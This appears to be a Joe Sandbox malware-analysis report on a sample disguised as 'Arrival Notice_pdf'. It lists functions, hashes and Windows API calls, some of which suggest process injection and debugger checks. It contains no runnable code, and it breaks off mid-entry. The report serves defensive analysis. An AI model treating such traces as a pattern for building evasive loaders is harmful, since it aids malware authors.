Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: c546473139ea00b8c7a251a5336bdcbecb47dab8cf9eaa0802b93dfee1e0e7cf
Instruction ID: bddff9c598895768a39f318534d9a7725d02813d638a43a0c500c35b06421a85
Opcode Fuzzy Hash: c546473139ea00b8c7a251a5336bdcbecb47dab8cf9eaa0802b93dfee1e0e7cf
Instruction Fuzzy Hash: 7C318EB4515711CFC729DF24D84569BBBE8FF48308F00092EF6DA82241E771A954CB92

Function 0026395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00263973

Part of subcall function 002681C2: __NMSG_WRITE.LIBCMT ref: 002681E9
Part of subcall function 002681C2: __NMSG_WRITE.LIBCMT ref: 002681F3

__NMSG_WRITE.LIBCMT ref: 0026397A

Part of subcall function 0026821F: GetModuleFileNameW.KERNEL32(00000000,00300312,00000104,00000000,00000001,00000000), ref: 002682B1
Part of subcall function 0026821F: ___crtMessageBoxW.LIBCMT ref: 0026835F

Part of subcall function 00261145: ___crtCorExitProcess.LIBCMT ref: 0026114B
Part of subcall function 00261145: ExitProcess.KERNEL32 ref: 00261154

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000001,00000000,?,?,0025F507,?,0000000E), ref: 0026399F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 0cfbe775b202efc9615ade66ee7470d3e94a105ada4eb9f8f09b49fb9e0a4f0b
Instruction ID: b45ea22d584917c898bf48b2752efcff29776d68729e2fab0a2f443d414870ac
Opcode Fuzzy Hash: 0cfbe775b202efc9615ade66ee7470d3e94a105ada4eb9f8f09b49fb9e0a4f0b
Instruction Fuzzy Hash: 1601D6312766029AE6167B35EC52B2A23589F82724F240126F505971D1DFF09DE04EA0

Function 0028C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0028C385,?,?,?,?,?,00000004), ref: 0028C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0028C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0028C708
CloseHandle.KERNEL32(00000000,?,0028C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0028C70F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: c0ae0a2deccf4337228c9480578ec99ae495d882cafe630be9ce7e0046b337cb
Instruction ID: 2eef04a0bfcef469a24221d1dcaf27d8d4fd8c2d3366b4ac227d1a6d5ada7c95
Opcode Fuzzy Hash: c0ae0a2deccf4337228c9480578ec99ae495d882cafe630be9ce7e0046b337cb
Instruction Fuzzy Hash: C1E08632141214B7D7212F54BC0DFCA7B18AB45760F144120FB14690E097F125219B98

Function 002A0828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 002A08FD

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

_wcscpy.LIBCMT ref: 002A098C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: f9d9b769d540b55828fc2b8e9217f93449d9e6eda5012eceb1fd63e6b7b948da
Instruction ID: 8a61746432765b889cb514ca5261015c419d908690df4e678257e86a640e160b
Opcode Fuzzy Hash: f9d9b769d540b55828fc2b8e9217f93449d9e6eda5012eceb1fd63e6b7b948da
Instruction Fuzzy Hash: 9B913B34A20605DFCB18DF18C5D1969B7E5FF4A310B5580AAE91A8F3A2DB30ED65CF81

Function 00243A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00243A73

Part of subcall function 00261405: __lock.LIBCMT ref: 0026140B

Part of subcall function 00243ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00243AF3
Part of subcall function 00243ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00243B08

Part of subcall function 00243D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00243AA3,?), ref: 00243D45
Part of subcall function 00243D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00243AA3,?), ref: 00243D57
Part of subcall function 00243D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00301148,00301130,?,?,?,?,00243AA3,?), ref: 00243DC8
Part of subcall function 00243D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00243AA3,?), ref: 00243E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00243AB3

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: ff0fbdd6a6a119a38025ee9bb1f64da4a0975b03b581c9c77495307978917b4e
Instruction ID: 1871d1e807ae24fa311953014c6675c295445fee4662ca45899be095bbc90849
Opcode Fuzzy Hash: ff0fbdd6a6a119a38025ee9bb1f64da4a0975b03b581c9c77495307978917b4e
Instruction Fuzzy Hash: F2119D71914341DBC305EF29E84990FFBE9EB95750F00891FF885872A2DB7095A8CF92

Function 0026E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0026EA29
__close_nolock.LIBCMT ref: 0026EA42

Part of subcall function 00267BDA: __getptd_noexit.LIBCMT ref: 00267BDA

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 4509d57602886b51d66559c7d534863884c82dacacf3ca353b9efd1b24db2ea3
Instruction ID: 237526ff7f3e763a3ced31549c2faee844f769178c62c8c5b27ca15d176e80ce
Opcode Fuzzy Hash: 4509d57602886b51d66559c7d534863884c82dacacf3ca353b9efd1b24db2ea3
Instruction Fuzzy Hash: 2A11E5768356508ADB12BFE4D8567187A616F81335F270341E4201F1E2CBB48CE08FA5

Function 0025F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0026395C: __FF_MSGBANNER.LIBCMT ref: 00263973
Part of subcall function 0026395C: __NMSG_WRITE.LIBCMT ref: 0026397A
Part of subcall function 0026395C: RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000001,00000000,?,?,0025F507,?,0000000E), ref: 0026399F

std::exception::exception.LIBCMT ref: 0025F51E
__CxxThrowException@8.LIBCMT ref: 0025F533

Part of subcall function 00266805: RaiseException.KERNEL32(?,?,0000000E,002F6A30,?,?,?,0025F538,0000000E,002F6A30,?,00000001), ref: 00266856

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: c96fbfa150980179ca513951fe5cebe537c04455bea51383591f4429628639b3
Instruction ID: 94c036c0a43e4c2b87827078786df65a776ff27c394bc08588a086c1d039b9a8
Opcode Fuzzy Hash: c96fbfa150980179ca513951fe5cebe537c04455bea51383591f4429628639b3
Instruction Fuzzy Hash: 49F0A43116421E67DB04BFA9D905AEEB7AC9F00354F644539FE0892181DBB09AB48AA9

Function 002635E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

__lock_file.LIBCMT ref: 00263629

Part of subcall function 00264E1C: __lock.LIBCMT ref: 00264E3F

__fclose_nolock.LIBCMT ref: 00263634

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 0d144a428525a66039da9ecc38866cb0f1ae394c2fb4dfefaf948efcda5628ee
Instruction ID: e6e7f98625dc3c0cec4cd90be4d3eed0ead244ad2be3043da8cb052b28367675
Opcode Fuzzy Hash: 0d144a428525a66039da9ecc38866cb0f1ae394c2fb4dfefaf948efcda5628ee
Instruction Fuzzy Hash: F5F02B31C30204AAD711FF64C80676EB6A46F00334F258118E411AB2C1C7BC8AE19F99

Function 00D0732D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D07AEB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D07B81
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D07BA3

Memory Dump Source

Source File: 00000000.00000002.1787683260.0000000000D06000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D06000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d06000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: 711d230fd835eefb60fe7b92701377785dcee2eb3661edb9db66f68908a6a3d1
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: 1A12CF24E18658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7E5E77A5F81CB5A

Function 0024E8A0 Relevance: 1.7, APIs: 1, Instructions: 204windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0024E959

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 282482378bc3aa11cd9211a580520b02aa476cf20a8efd4773b34fb115dfbb13
Instruction ID: e8906a2f51a0b7b35611cebcdd39f10d5574359f518ec6c81fcacfeb0353ba4c
Opcode Fuzzy Hash: 282482378bc3aa11cd9211a580520b02aa476cf20a8efd4773b34fb115dfbb13
Instruction Fuzzy Hash: 2A7137709243918FFF2ACF24C8887AA7BD4FB55304F08497AEC858F291D7719895CB82

Function 00262957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00262A0B

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: cd59e7a1cd291a044ec34b72d1fe99ba400fb6d7abdd0204b44a3616c17273c9
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: BD419531721F07DFDB288EA9C8815AE77A6AF84360B24852DE855C7280D6B4DDE98B40

Function 0025ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0025EDC7

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 35795d7fd61be7021b1ed5fcdcd7566fe4820bb54faa5ec686b4ef352f14dbbc
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: FF310970A11106DBCB18DF18C480969FBBAFF49341B6586A5E809CB255DB30EED5CF84

Function 002A040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002A0519

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c6b1c0e897d3a1998d0e1cec159533610450a67ee733fd286ace61b7dc6cbf93
Instruction ID: 720ffb60f33c9852a549de5cc90b2af425b5822be076c0834d6f1c17e7281198
Opcode Fuzzy Hash: c6b1c0e897d3a1998d0e1cec159533610450a67ee733fd286ace61b7dc6cbf93
Instruction Fuzzy Hash: 5B31A275524524DFCB01AF10D0D066E7BB0FF4A721F21844AEA961B386DBB4AD69CF81

Function 002B9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 002B9A80

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 61648834821c35d392126524d5053701e5a00aea923b4f1ee710376383c206ea
Instruction ID: 07982f0627715e0339b1a2e64f9bb1ce3a0b0730391601a60f6b23548013cba7
Opcode Fuzzy Hash: 61648834821c35d392126524d5053701e5a00aea923b4f1ee710376383c206ea
Instruction Fuzzy Hash: 00415B705246118FDB24CF14C484B1ABBE0BF45348F1989ACE99A4B362D372ECA9CF46

Function 002441A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00244214: FreeLibrary.KERNEL32(00000000,?), ref: 00244247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002439FE,?,00000001), ref: 002441DB

Part of subcall function 00244291: FreeLibrary.KERNEL32(00000000), ref: 002442C4

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 7a450e8e689d80e9fe5138f9ae3eaee4d08696a395a37cf66af24effb5774a62
Instruction ID: b3f25c9c568fede4202f8b14eeddc8311963d22e6de2e2bb90eaf24b17f69400
Opcode Fuzzy Hash: 7a450e8e689d80e9fe5138f9ae3eaee4d08696a395a37cf66af24effb5774a62
Instruction Fuzzy Hash: D911A731720306AADB18FF74DC16FAE77A59F40700F108429B996A61C1DEB09A219F60

Function 002B9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 002B9B51

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8f5b727d4e90b9b00df8fecd3e5e5fe66cf3f0e399ea3ce69d40b1d4e2f3903b
Instruction ID: 13c4c8735ed3b60bce34ca5342a8837702706e44fe49673eb5c384ee67c751af
Opcode Fuzzy Hash: 8f5b727d4e90b9b00df8fecd3e5e5fe66cf3f0e399ea3ce69d40b1d4e2f3903b
Instruction Fuzzy Hash: 7B216970528601CFDB24DF24C884B1ABBF1BF85305F15496CE99A4B221D771F869CF56

Function 0026AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0026AFC0

Part of subcall function 00267BDA: __getptd_noexit.LIBCMT ref: 00267BDA

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: bc6e46951585386437137fbfab8d20ebdab355d11e66d87e362d952400c34d98
Instruction ID: b6d8764f4977b181128c0260cb9258563bce0cd6158ab88d69db2a5fb97227b4
Opcode Fuzzy Hash: bc6e46951585386437137fbfab8d20ebdab355d11e66d87e362d952400c34d98
Instruction Fuzzy Hash: 7211BF728356409BD7136FA498467697BA0AF41339F254241E4349B1E2C7B58DF08FA2

Function 002439DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
Instruction ID: b50799bb57f3897e1ff86564e8106777cbfea0e3276e94f30a853edbde8f0bed
Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
Instruction Fuzzy Hash: C401863142010AEECF08EFA4C8918FEBB74AF10344F108026B51597195EA309A69CF60

Function 00262AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00262AED

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 329631b5dd9259bdf5daf42723408d47c8e99824675c7c270618cf2ff4286224
Instruction ID: cb713c3e7270489438f9bc9fba3e054a5b5e27a1048b79a76c8af38509a1ba4e
